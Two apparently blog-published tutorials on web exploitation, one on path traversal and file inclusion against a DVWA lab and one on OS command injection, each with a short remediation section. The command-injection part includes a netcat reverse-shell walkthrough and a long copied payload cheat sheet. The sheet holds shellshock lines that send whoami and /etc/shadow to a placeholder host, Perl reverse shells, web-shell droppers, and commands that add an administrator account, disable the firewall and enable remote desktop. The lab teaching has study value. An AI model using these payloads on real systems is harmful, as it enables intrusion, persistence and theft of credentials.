Basics of Path Traversal

by Vry4n_ | Mar 24, 2020 | Web Exploitation

Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files. In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to modify application data or behavior, and ultimately take full control of the server.

Path traversal vulnerabilities arise when the application uses user-controllable (user supplied/untrusted) data to access files and directories on the application server or another backend file system in an unsafe way.

By submitting crafted input, an attacker may be able to cause arbitrary content to be read from, or written to, anywhere on the file system being accessed. Usually the same access as the application/user running the script.

https://owasp.org/www-community/vulnerabilities/PHP_File_Inclusion

Example

When the server processes this request, it follows these steps:

1. Extracts the value of the filename parameter from the query string.

• http://192.168.0.6/dvwa/vulnerabilities/fi/?page=include.php
• page=include.php

2. Opens the file with this name.

• include.php

3. Reads the file’s contents and returns it to the client.

This functionality is often found in work fl ow applications where users can share documents, in blogging and auction applications where users can upload images, and in informational applications where users can retrieve documents such as ebooks, technical manuals, and company reports.

1. Review the information gathered during application mapping to identify the following:

• Any instance where a request parameter appears to contain the name of a file or directory, such as include=vk9.php or template=/en/ sidebar.
• Any application functions whose implementation is likely to involve retrieval of data from a server file system (as opposed to a back-end database), such as documents or images.

2. Look for error messages or other anomalous events that are of interest. Try to find any evidence of instances where user-supplied data is being passed to file APIs or as parameters to operating system commands.

Detecting Path Traversal Vulnerabilities

Having identified the various potential targets for path traversal testing, you need to test every instance individually to determine whether user-controllable data is being passed to relevant file system operations in an unsafe manner.

1. Modify the parameter’s value to insert an arbitrary subdirectory and a single traversal sequence. For example, if the application submits this parameter:

• file=foo/file1.txt

try submitting this value:

• file=foo/bar/../file1.txt

If the application’s behavior is identical in the two cases, it may be vulnerable. You can also use absolute paths. You might be able to use an absolute path from the filesystem root, such as filename=/etc/passwd, to directly reference a file without using any traversal sequences.

• file=/etc/passwd

Example

Successul

• http://192.168.0.6/dvwa/vulnerabilities/fi/?page=foo/../include.php

Unsuccessful

• http://192.168.0.6/dvwa/vulnerabilities/fi/?page=foo/include.php

Successful

• http://192.168.0.6/dvwa/vulnerabilities/fi/?page=/etc/passwd

2. If the application’s behavior is different in the two cases, it may be blocking, stripping, or sanitizing traversal sequences, resulting in an invalid file path.

The reason why this test is effective, even if the subdirectory “bar” does not exist, is that most common file systems perform canonicalization of the file path before attempting to retrieve it.

3. If the application function you are attacking provides read access to a file, attempt to access a known world-readable file on the operating system in question.

• ../../../../../../../../../../../../etc/passwd
• ../../../../../../../../../../../../windows/win.ini

Example

• http://192.168.0.6/dvwa/vulnerabilities/fi/?page=../../../../../../../../../etc/hosts

4. If the function you are attacking provides write access to a file, it may be more difficult to verify conclusively whether the application is vulnerable. One test that is often effective is to attempt to write two files –

one that should be writable by any user

• ../../../../../../../../../../../../writetest.txt
• ../../../../../../../../../../../../tmp/writetest.txt

one that should not be writable only by root or Administrator.

• ../../../../../../../../../../../../windows/system32/config/sam
• ../../../../../../../../../../../../tmp

5. An alternative method for verifying a traversal flaw with write access is to try to write a new file within the web root of the web server and then attempt to retrieve this with a browser. However, this method may not work

• if you do not know the location of the web root directory
• if the user context in which the file access occurs does not have permission to write there.

Circumventing Obstacles to Traversal Attacks

If your initial attempts to perform a traversal attack (as just described) are unsuccessful, this does not mean that the application is not vulnerable. There might be some filters protecting the application, these can be by passed.

First filter type

The first type of input filter commonly encountered involves checking whether the filename parameter contains any path traversal sequences. If it does, the filter either rejects the request or attempts to sanitize the input to remove the sequences. This type of filter is often vulnerable to various attacks that use alternative encodings and other tricks to defeat the filter.

1. Always try path traversal sequences using both forward slashes and backslashes. Many input filters check for only one of these, when the filesystem may support both.

2. Try simple URL-encoded representations of traversal sequences using the following encodings. You might be able to use various non-standard encodings, such as ..%c0%af or ..%252f, to bypass the input filter. Be sure to encode every single slash and dot within your input:

• Dot: %2e
• Forward slash: %2f
• Backslash: %5c

3. Try using 16-bit Unicode encoding:

• Dot: %u002e
• Forward slash: %u2215
• Backslash: %u2216

4. Try double URL encoding:

• Dot: %252e
• Forward slash: %252f
• Backslash: %255

5. Try overlong UTF-8 Unicode encoding: n

• Dot: %c0%2e, %e0%40%ae, %c0ae,
• Forward slash: %c0%af, %e0%80%af, %c0%2f, and so on
• Backslash: %c0%5c, %c0%80%5

Example

• web-security-academy.net/image?filename=..%252f..%252f..%252fetc/passwd

Successful

• http://192.168.0.6/dvwa/vulnerabilities/fi/?page=%2fetc/passwd

6. If the application is attempting to sanitize user input by removing traversal sequences and does not apply this filter recursively, it may be possible to bypass the filter by placing one sequence within another, You might be able to use nested traversal sequences, such as ….// or ….\/, which will revert to simple traversal sequences when the inner sequence is stripped

• ….//
• ….\/
• …./\
• ….\\

Example

• web-security-academy.net/image?filename=….//….//….//etc/passwd

Successful

• http://192.168.0.6/dvwa/vulnerabilities/fi/?page=//etc/passwd

Second filter type

The second type of input filter commonly encountered in defenses against path traversal attacks involves verifying whether the user-supplied filename contains a suffix (file type) or prefix (starting directory) that the application expects.

1. Some applications check whether the user-supplied filename ends in a particular file type or set of file types and reject attempts to access anything else. Sometimes this check can be subverted by placing a URLencoded null byte at the end of your requested filename, followed by a file type that the application accepts. it might be possible to use a null byte to effectively terminate the file path before the required extension

• ../../../../../boot.ini%00.jpg

Example

• web-security-academy.net/image?filename=../../../../../etc/passwd%00.jpg

Successful

• http://192.168.0.6/dvwa/vulnerabilities/fi/?page=/etc/passwd%00.php

2. Some applications attempt to control the file type being accessed by appending their own file-type suffix to the filename supplied by the user.

Some applications check whether the user-supplied filename starts with a particular subdirectory of the start directory, or even a specific filename. If an application requires that the user-supplied filename must start with the expected base folder, such as /var/www/images, then it might be possible to include the required base folder followed by suitable traversal sequences. This check can, of course, be bypassed easily as follows:

• filestore/../../../../../../../etc/passwd

Example

• web-security-academy.net/image?filename=/var/www/images/../../../../../../../etc/passwd

Successful

• http://192.168.0.6/dvwa/vulnerabilities/fi/?page=/var/www/../../../etc/passwd

3. If none of the preceding attacks against input filters is successful individually, the application might be implementing multiple types of filters. Therefore, you need to combine several of these attacks simultaneously (both against traversal sequence filters and file type or directory filters). If possible, the best approach here is to try to break the problem into separate stages

Successful

• diagram1.jpg

Unsuccessful

• foo//….//diagram1.jpg

try all the possible traversal sequence bypasses until a variation on the second request is successful.

Exploiting Traversal Vulnerabilities

You can exploit read access path traversal flaws to retrieve interesting files from the server that may contain directly useful information or that help you refi ne attacks against other vulnerabilities. For example:

• Password files for the operating system and application
• Server and application configuration files to discover other vulnerabilities or fi ne-tune a different attack
• Include fi les that may contain database credentials
• Data sources used by the application, such as MySQL database fi les or XML files
• The source code to server-executable pages to perform a code review in search of bugs (for example, GetImage.aspx?file=GetImage.aspx)
• Application log files that may contain usernames and session tokens and the like

If you find a path traversal vulnerability that grants write access, your main goal should be to exploit this to achieve arbitrary execution of commands on the server. Here are some ways to exploit this vulnerability:

• Create scripts in users’ startup folders.
• Modify fi les such as in.ftpd to execute arbitrary commands when a user next connects.
• Write scripts to a web directory with execute permissions, and call them from your browser.

Finding File Inclusion Vulnerabilities

File inclusion vulnerabilities may arise in relation to any item of user-supplied data. They are particularly common in request parameters that specify a language or location.

Remote File Inclusion (RFI)

Consider an application that delivers different content to people in different locations. When users choose their location, this is communicated to the server via a request parameter, as follows:

• https://vk9-sec.com/main.php?Country=US

The application processes the Country parameter as follows:

• $country = $_GET[‘Country’]; include( $country . ‘.php’ );

This causes the execution environment to load the file US.php that is located on the web server file system. The contents of this file are effectively copied into the main.php fi le and executed.

First, specify an external URL as the location of the include file. The PHP include function accepts this as input, and the execution environment retrieves the specified file and executes its contents. Hence, an attacker can construct a malicious script containing arbitrarily complex content, host this on a web server he controls, and invoke it for execution via the vulnerable application function

• https://vk9-sec.com/main.php?Country=http://192.168.0.110/backdoor

Exploitation Steps

• Submit in each targeted parameter a URL for a resource on a web server that you control, and determine whether any requests are received from the server hosting the target application.
• If the first test fails, try submitting a URL containing a nonexistent IP address, and determine whether a timeout occurs while the server attempts to connect.
• If the application is found to be vulnerable to remote file inclusion, construct a malicious script using the available APIs in the relevant language, as described for dynamic execution attacks.

Local File Inclusion (LFI)

Sometimes, include files are loaded on the basis of user-controllable data, but it is not possible to specify a URL to a file on an external server. This is done with local files.

if user-controllable data is passed to the ASP function Server.Execute, an attacker may be able to cause an arbitrary ASP script to be executed, provided that this script belongs to the same application as the one that is calling the function.

There may be server-executable fi les on the server that you cannot access through the normal route. For example, any requests to the path /admin may be blocked through application-wide access controls. If you can cause sensitive functionality to be included into a page that you are authorized to access, you may be able to gain access to that functionality.

• https://vk9-sec.com/example.php (denied)
• https://vk9-sec.com/get-file.php?read=example.php (worked since we are reading it through a function)

Exploitation Steps

• Submit the name of a known executable resource on the server, and determine whether any change occurs in the application’s behavior.
• Submit the name of a known static resource on the server, and determine whether its contents are copied into the application’s response
• If the application is vulnerable to local file inclusion, attempt to access any sensitive functionality or resources that you cannot reach directly via the web server
• Test to see if you can access files in other directories using the traversal techniques described previously.

Remedy

the most effective means of eliminating path traversal vulnerabilities is to avoid passing user-submitted data to any file system API. Many application functions that do this can be rewritten to deliver the same behavior in a safer way.

Most files that are not subject to any access control can simply be placed within the web root and accessed via a direct URL

• The application should validate the user input before processing it. Ideally, the validation should compare against a whitelist of permitted values. If that isn’t possible for the required functionality, then the validation should verify that the input contains only permitted content, such as purely alphanumeric characters.
• It can use a different identifier to specify which file is required, such as an index number. Any request containing an invalid identifier can be rejected, and there is no attack surface for users to manipulate the path of fi les delivered by the page.
• After performing all relevant decoding and canonicalization of the user submitted filename, the application should check whether it contains either of the path traversal sequences (using backslashes or forward slashes) or any null bytes.
• The application should use a hard-coded list of permissible fi le types and reject any request for a different type (after the preceding decoding and canonicalization have been performed).
• After performing all its filtering on the user-supplied filename, the application should use suitable file system APIs to verify that nothing is amiss and that the fi le to be accessed using that filename is located in the start directory specified by the application.

In Java, this can be achieved by instantiating a java.io.File object using the user-supplied filename and then calling the getCanonicalPath method on this object. If the string returned by this method does not begin with the name of the start directory, the user has somehow bypassed the application’s input filters, and the request should be rejected.

• After validating the supplied input, the application should append the input to the base directory and use a platform filesystem API to canonicalize the path. It should verify that the canonicalized path starts with the expected base directory.
• the chrooted directory is treated as if it is the file system root, and any redundant traversal sequences that attempt to step up above it are ignored.
• The application should integrate its defenses against path traversal attacks with its logging and alerting mechanisms

Below is an example of some simple Java code to validate the canonical path of a file based on user input:

File file = new File(BASE_DIRECTORY, userInput);

if (file.getCanonicalPath().startsWith(BASE_DIRECTORY)) {

// process file

}

Basic Command injection

by Vry4n_ | Mar 19, 2020 | Web Exploitation

Command injection is one of the top 10 OWASP vulnerability. it’s an attack in which arbitrary commands of a host OS are executed through a vulnerable application.

The attack is possible when a web application sends unsafe user data to the system shell function within the running script. This user data can be in any form such as forms, cookies, HTTP Methods, etc.

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data.

https://owasp.org/www-community/attacks/Command_Injection

Example of functions that can execute system commands

Verify parameters to inject data

• GET: In this method input parameters are sent in URLs.
• POST: In this method, input parameters are sent in the HTTP body.
• HEADER: Discover end users and display requested information to the user based on the value in the headers.

Command injection can happen at

• Cookies
• X-Forwarded-For
• User-agent
• Referrer

Injection operators

In order to properly test for command injection vulnerabilities, the following steps should be followed:

• Step 1: Understand Attack Scenario (input field)
• Step 2: Analyze Causes and Countermeasures (functionality)
• Step 3: Start Testing and Exploring (start with ping time delay)
• Step 4: Fine-tune Test Cases (use different operators and techniques)

There are 2 types of command Injection

Result or Error based injection

• When an attacker injects a command through an input parameter and the output of that command is displayed on the certain web page, it proves that the application is vulnerable to the command injection.
• The displayed result might be in the form of an error or the actual STDOUT of the command that you tried to run.

Blind based injection

• The results of the commands that you inject will not be displayed to the attacker
• no error messages are returned it similar as blind SQL injection

It is important that you consider different encodings and data format for additional command injection entry points such as: input fields, URL parameters, POST data, web service methods, user interface elements, environment variables, database contents, registry contents, file contents, third party APIs, and network packets.

• file.txt”|dir%20c:
• file.txt”|dir+c:

Example

We can see that user input is not sanitized. Input is collected and passed to shell_exec function

Testing the application

1. I entered a text “VK9 Security” and it is printed on screen

2. I will use the operator “;” to test sleep, time based injection, the application takes a while to respond, that means it is prone to command injection

• VK9 ; sleep 60

Result

3. Knowing that the application is vulnerable, we can read sensitive files and list them, too

• VK9 ; ls ; pwd

4. We can also run a reverse shell, first confirm if ‘nc’ is installed, otherwise, you can use bash, php, etc.

• VK9 ; whereis nc

5. Start a listener in the local machine Kali/Parrot

• nc -lvnp 4444

6. Run the netcat command to communicate back to our host

• VK9 ; nc -e /bin/bash 192.168.0.7 4444

7. Check on the listener and you should get the reverse connection

• whoami

Time delay

Ping can be used as a time delay command, depending on the number of requests the time may vary, even if the injection is blind

• VK9 ; ping -c 15 google.com

Result

Writing a file to test Blind

1. We can use the echo default command to redirect output to a file using “>” operator

• vk9 security > /tmp/vk9.txt

2. Access the file, it was saved in /tmp folder, using the browser

• http://localhost/mutillidae/index.php?page=/tmp/vk9.txt

Out-of-band testing

We can use back quotes to execute a command, in this case we are using nslookup to print `whoami` output, it printed www-data.google.com back

• vk9 & nslookup `whoami`.google.com

On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:

• ` injected command `
• $( injected command )

Remedy

https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html

By far the most effective way to prevent OS command injection vulnerabilities is to never call out to OS commands from application-layer code.

If it is considered unavoidable to call out to OS commands with user-supplied input, then strong input validation must be performed.

• Validating against a whitelist of permitted values.
• Strong server-side validation
• Implement a white list
• OS Hardening
• Use build-in API’s for interacting with the OS if needed. More secure!!
• Avoid applications from calling out directly the OS system commands
• Validating that the input is a number.
• Validating that the input contains only alphanumeric characters, no other syntax or whitespace.
• Never attempt to sanitize input by escaping shell metacharacters.

Cheatsheet

Some techniques are shown below

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

Unix

<!–#exec%20cmd="/bin/cat%20/etc/passwd"–>

<!–#exec%20cmd="/bin/cat%20/etc/shadow"–>

<!–#exec%20cmd="/usr/bin/id;–>

<!–#exec%20cmd="/usr/bin/id;–>

/index.html|id|

;id;

;id

;netstat -a;

;id;

|id

|/usr/bin/id

|id|

|/usr/bin/id|

||/usr/bin/id|

|id;

||/usr/bin/id;

;id|

;|/usr/bin/id|

\n/bin/ls -al\n

\n/usr/bin/id\n

\nid\n

\n/usr/bin/id;

\nid;

\n/usr/bin/id|

\nid|

;/usr/bin/id\n

;id\n

|usr/bin/id\n

|nid\n

`id`

`/usr/bin/id`

a);id

a;id

a);id;

a;id;

a);id|

a;id|

a)|id

a|id

a)|id;

a|id

|/bin/ls -al

a);/usr/bin/id

a;/usr/bin/id

a);/usr/bin/id;

a;/usr/bin/id;

a);/usr/bin/id|

a;/usr/bin/id|

a)|/usr/bin/id

a|/usr/bin/id

a)|/usr/bin/id;

a|/usr/bin/id

;system(‘cat%20/etc/passwd’)

;system(‘id’)

;system(‘/usr/bin/id’)

%0Acat%20/etc/passwd

%0A/usr/bin/id

%0Aid

%0A/usr/bin/id%0A

%0Aid%0A

& ping -i 30 127.0.0.1 &

& ping -n 30 127.0.0.1 &

%0a ping -i 30 127.0.0.1 %0a

`ping 127.0.0.1`

| id

& id

; id

%0a id %0a

`id`

$;/usr/bin/id

Windows

`

||

|

;

‘

‘”

”

“‘

&

&&

%0a

%0a%0d

%0Acat%20/etc/passwd

%0Aid

%0a id %0a

%0Aid%0A

%0a ping -i 30 127.0.0.1 %0a

%0A/usr/bin/id

%0A/usr/bin/id%0A

%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1

%20{${phpinfo()}}

%20{${sleep(20)}}

%20{${sleep(3)}}

a|id|

a;id|

a;id;

a;id\n

() { :;}; /bin/bash -c “curl http://[Web IP]/.testing/shellshock.txt?vuln=16?user=\`whoami\`”

() { :;}; /bin/bash -c “curl http://[Web IP]/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`”

() { :;}; /bin/bash -c “curl http://[Web IP]/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`”

() { :;}; /bin/bash -c “curl http://[Web IP]/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`”

() { :;}; /bin/bash -c “curl http://[Web IP]/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`”

() { :;}; /bin/bash -c “curl http://[Web IP]/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`”

() { :;}; /bin/bash -c “curl http://[Web IP]/.testing/shellshock.txt?vuln=5”

() { :;}; /bin/bash -c “sleep 1 && curl http://[Web IP]/.testing/shellshock.txt?sleep=1&?vuln=6”

() { :;}; /bin/bash -c “sleep 1 && echo vulnerable 1”

() { :;}; /bin/bash -c “sleep 3 && curl http://[Web IP]/.testing/shellshock.txt?sleep=3&?vuln=7”

() { :;}; /bin/bash -c “sleep 3 && echo vulnerable 3”

() { :;}; /bin/bash -c “sleep 6 && curl http://[Web IP]/.testing/shellshock.txt?sleep=6&?vuln=8”

() { :;}; /bin/bash -c “sleep 6 && curl http://[Web IP]/.testing/shellshock.txt?sleep=9&?vuln=9”

() { :;}; /bin/bash -c “sleep 6 && echo vulnerable 6”

() { :;}; /bin/bash -c “wget http://[Web IP]/.testing/shellshock.txt?vuln=17?user=\`whoami\`”

() { :;}; /bin/bash -c “wget http://[Web IP]/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`”

() { :;}; /bin/bash -c “wget http://[Web IP]/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`”

() { :;}; /bin/bash -c “wget http://[Web IP]/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`”

() { :;}; /bin/bash -c “wget http://[Web IP]/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`”

() { :;}; /bin/bash -c “wget http://[Web IP]/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`”

() { :;}; /bin/bash -c “wget http://[Web IP]/.testing/shellshock.txt?vuln=4″

cat /etc/hosts

$(`cat /etc/passwd`)

cat /etc/passwd

() { :;}; curl http://[Web IP]/.testing/shellshock.txt?vuln=12

| curl http://example.com/.testing/rce.txt

& curl http://example.com/.testing/rce.txt

; curl https://example.com/.testing/rce_vuln.txt

&& curl https://example.com/.testing/rce_vuln.txt

curl https://example.com/.testing/rce_vuln.txt

curl https://example.com/.testing/rce_vuln.txt ||`curl https://example/.testing/rce_vuln.txt` #’ |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\” |curl https://crowdshield.com/.testing/rce_vuln.txt

curl https://example.com/.testing/rce_vuln.txt ||`curl https://example/.testing/rce_vuln.txt` #’ |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\” |curl https://crowdshield.com/.testing/rce_vuln.txt

$(`curl https://example.com/.testing/rce_vuln.txt?req=22jjffjbn`)

dir

| dir

; dir

$(`dir`)

& dir

&&dir

&& dir

| dir C:\

; dir C:\

& dir C:\

&& dir C:\

dir C:\

| dir C:\Documents and Settings\*

; dir C:\Documents and Settings\*

& dir C:\Documents and Settings\*

&& dir C:\Documents and Settings\*

dir C:\Documents and Settings\*

| dir C:\Users

; dir C:\Users

& dir C:\Users

&& dir C:\Users

dir C:\Users

;echo%20′<script>alert(1)</script>’

echo ‘<img src=https://example.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>’// XXXXXXXXXXX

| echo “<?php include($_GET[‘page’])| ?>” > rfi.php

; echo “<?php include($_GET[‘page’]); ?>” > rfi.php

& echo “<?php include($_GET[‘page’]); ?>” > rfi.php

&& echo “<?php include($_GET[‘page’]); ?>” > rfi.php

echo “<?php include($_GET[‘page’]); ?>” > rfi.php

| echo “<?php system(‘dir $_GET[‘dir’]’)| ?>” > dir.php

; echo “<?php system(‘dir $_GET[‘dir’]’); ?>” > dir.php

& echo “<?php system(‘dir $_GET[‘dir’]’); ?>” > dir.php

&& echo “<?php system(‘dir $_GET[‘dir’]’); ?>” > dir.php

echo “<?php system(‘dir $_GET[‘dir’]’); ?>” > dir.php

| echo “<?php system($_GET[‘cmd’])| ?>” > cmd.php

; echo “<?php system($_GET[‘cmd’]); ?>” > cmd.php

& echo “<?php system($_GET[‘cmd’]); ?>” > cmd.php

&& echo “<?php system($_GET[‘cmd’]); ?>” > cmd.php

echo “<?php system($_GET[‘cmd’]); ?>” > cmd.php

;echo ‘<script>alert(1)</script>’

echo ‘<script>alert(1)</script>’// XXXXXXXXXXX

echo ‘<script src=https://example.com/.testing/xss.js></script>’// XXXXXXXXXXX

| echo “use Socket;$i=”192.168.16.151”;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>;S”);open(STDOUT,”>;S”);open(STDERR,”>;S”);exec(“/bin/sh -i”);};” > rev.pl

; echo “use Socket;$i=”192.168.16.151”;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>;S”);open(STDOUT,”>;S”);open(STDERR,”>;S”);exec(“/bin/sh -i”);};” > rev.pl

& echo “use Socket;$i=”192.168.16.151”;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};” > rev.pl

&& echo “use Socket;$i=”192.168.16.151”;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};” > rev.pl

echo “use Socket;$i=”192.168.16.151”;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};” > rev.pl

() { :;}; echo vulnerable 10

eval(‘echo something’)

eval(‘ls’)

eval(‘pwd’)

eval(‘pwd’);

eval(‘sleep 5’)

eval(‘sleep 5’);

eval(‘whoami’)

eval(‘whoami’);

exec(‘echo something’)

exec(‘ls’)

exec(‘pwd’)

exec(‘pwd’);

exec(‘sleep 5’)

exec(‘sleep 5’);

exec(‘whoami’)

exec(‘whoami’);

;{$_GET[“cmd”]}

`id`

|id

| id

;id

;id|

;id;

& id

&&id

;id\n

ifconfig

| ifconfig

; ifconfig

& ifconfig

&& ifconfig

/index.html|id|

ipconfig

| ipconfig /all

; ipconfig /all

& ipconfig /all

&& ipconfig /all

ipconfig /all

ls

$(`ls`)

| ls -l /

; ls -l /

& ls -l /

&& ls -l /

ls -l /

| ls -laR /etc

; ls -laR /etc

& ls -laR /etc

&& ls -laR /etc

| ls -laR /var/www

; ls -laR /var/www

& ls -laR /var/www

&& ls -laR /var/www

| ls -l /etc/

; ls -l /etc/

& ls -l /etc/

&& ls -l /etc/

ls -l /etc/

ls -lh /etc/

| ls -l /home/*

; ls -l /home/*

& ls -l /home/*

&& ls -l /home/*

ls -l /home/*

*; ls -lhtR /var/www/

| ls -l /tmp

; ls -l /tmp

& ls -l /tmp

&& ls -l /tmp

ls -l /tmp

| ls -l /var/www/*

; ls -l /var/www/*

& ls -l /var/www/*

&& ls -l /var/www/*

ls -l /var/www/*

<!–#exec cmd=”/bin/cat /etc/passwd”–>

<!–#exec cmd=”/bin/cat /etc/shadow”–>

<!–#exec cmd=”/usr/bin/id;–>

\n

\n\033[2curl http://[Web IP]/.testing/term_escape.txt?vuln=1?user=\`whoami\`

\n\033[2wget http://[Web IP]/.testing/term_escape.txt?vuln=2?user=\`whoami\`

\n/bin/ls -al\n

| nc -lvvp 4444 -e /bin/sh|

; nc -lvvp 4444 -e /bin/sh;

& nc -lvvp 4444 -e /bin/sh&

&& nc -lvvp 4444 -e /bin/sh &

nc -lvvp 4444 -e /bin/sh

nc -lvvp 4445 -e /bin/sh &

nc -lvvp 4446 -e /bin/sh|

nc -lvvp 4447 -e /bin/sh;

nc -lvvp 4448 -e /bin/sh&

\necho INJECTX\nexit\n\033[2Acurl https://example.com/.testing/rce_vuln.txt\n

\necho INJECTX\nexit\n\033[2Asleep 5\n

\necho INJECTX\nexit\n\033[2Awget https://example.com/.testing/rce_vuln.txt\n

| net localgroup Administrators hacker /ADD

; net localgroup Administrators hacker /ADD

& net localgroup Administrators hacker /ADD

&& net localgroup Administrators hacker /ADD

net localgroup Administrators hacker /ADD

| netsh firewall set opmode disable

; netsh firewall set opmode disable

& netsh firewall set opmode disable

&& netsh firewall set opmode disable

netsh firewall set opmode disable

netstat

;netstat -a;

| netstat -an

; netstat -an

& netstat -an

&& netstat -an

netstat -an

| net user hacker Password1 /ADD

; net user hacker Password1 /ADD

& net user hacker Password1 /ADD

&& net user hacker Password1 /ADD

net user hacker Password1 /ADD

| net view

; net view

& net view

&& net view

net view

\nid|

\nid;

\nid\n

\n/usr/bin/id\n

perl -e ‘print “X”x1024’

|| perl -e ‘print “X”x16096’

| perl -e ‘print “X”x16096’

; perl -e ‘print “X”x16096’

& perl -e ‘print “X”x16096’

&& perl -e ‘print “X”x16096’

perl -e ‘print “X”x16384’

; perl -e ‘print “X”x2048’

& perl -e ‘print “X”x2048’

&& perl -e ‘print “X”x2048’

perl -e ‘print “X”x2048’

|| perl -e ‘print “X”x4096’

| perl -e ‘print “X”x4096’

; perl -e ‘print “X”x4096’

& perl -e ‘print “X”x4096’

&& perl -e ‘print “X”x4096’

perl -e ‘print “X”x4096’

|| perl -e ‘print “X”x8096’

| perl -e ‘print “X”x8096’

; perl -e ‘print “X”x8096’

&& perl -e ‘print “X”x8096’

perl -e ‘print “X”x8192’

perl -e ‘print “X”x81920’

|| phpinfo()

| phpinfo()

{${phpinfo()}}

;phpinfo()

;phpinfo();//

‘;phpinfo();//

{${phpinfo()}}

& phpinfo()

&& phpinfo()

phpinfo()

phpinfo();

<?php system(“cat /etc/passwd”);?>

<?php system(“curl https://example.com/.testing/rce_vuln.txt?method=phpsystem_get”);?>

<?php system(“curl https://example.com/.testing/rce_vuln.txt?req=df2fkjj”);?>

<?php system(“echo something”);?>

<?php system(“sleep 10”);?>

<?php system(“sleep 5”);?>

<?php system(“wget https://example.com/.testing/rce_vuln.txt?method=phpsystem_get”);?>

<?php system(“wget https://example.com/.testing/rce_vuln.txt?req=jdfj2jc”);?>

:phpversion();

`ping 127.0.0.1`

& ping -i 30 127.0.0.1 &

& ping -n 30 127.0.0.1 &

;${@print(md5(RCEVulnerable))};

${@print(“RCEVulnerable”)}

${@print(system($_SERVER[‘HTTP_USER_AGENT’]))}

pwd

| pwd

; pwd

& pwd

&& pwd

\r

| reg add “HKLM\System\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

; reg add “HKLM\System\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

& reg add “HKLM\System\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

&& reg add “HKLM\System\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add “HKLM\System\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

\r\n

route

| sleep 1

; sleep 1

& sleep 1

&& sleep 1

sleep 1

|| sleep 10

| sleep 10

; sleep 10

{${sleep(10)}}

& sleep 10

&& sleep 10

sleep 10

|| sleep 15

| sleep 15

; sleep 15

& sleep 15

&& sleep 15

{${sleep(20)}}

{${sleep(20)}}

{${sleep(3)}}

{${sleep(3)}}

| sleep 5

; sleep 5

& sleep 5

&& sleep 5

sleep 5

{${sleep(hexdec(dechex(20)))}}

{${sleep(hexdec(dechex(20)))}}

sysinfo

| sysinfo

; sysinfo

& sysinfo

&& sysinfo

;system(‘cat%20/etc/passwd’)

system(‘cat C:\boot.ini’);

system(‘cat config.php’);

system(‘cat /etc/passwd’);

|| system(‘curl https://example.com/.testing/rce_vuln.txt’);

| system(‘curl https://example.com/.testing/rce_vuln.txt’);

; system(‘curl https://example.com/.testing/rce_vuln.txt’);

& system(‘curl https://example.com/.testing/rce_vuln.txt’);

&& system(‘curl https://example.com/.testing/rce_vuln.txt’);

system(‘curl https://example.com/.testing/rce_vuln.txt’)

system(‘curl https://example.com/.testing/rce_vuln.txt?req=22fd2wdf’)

system(‘curl https://example.com/.testing/rce_vuln.txt’);

system(‘echo something’)

systeminfo

| systeminfo

; systeminfo

& systeminfo

&& systeminfo

system(‘ls’)

system(‘pwd’)

system(‘pwd’);

|| system(‘sleep 5’);

| system(‘sleep 5’);

; system(‘sleep 5’);

& system(‘sleep 5’);

&& system(‘sleep 5’);

system(‘sleep 5’)

system(‘sleep 5’);

system(‘wget https://example.com/.testing/rce_vuln.txt?req=22fd2w23’)

system(‘wget https://example.com/.testing/rce_vuln.txt’);

system(‘whoami’)

system(‘whoami’);

test*; ls -lhtR /var/www/

test* || perl -e ‘print “X”x16096’

test* | perl -e ‘print “X”x16096’

test* & perl -e ‘print “X”x16096’

test* && perl -e ‘print “X”x16096’

test*; perl -e ‘print “X”x16096’

$(`type C:\boot.ini`)

&&type C:\\boot.ini

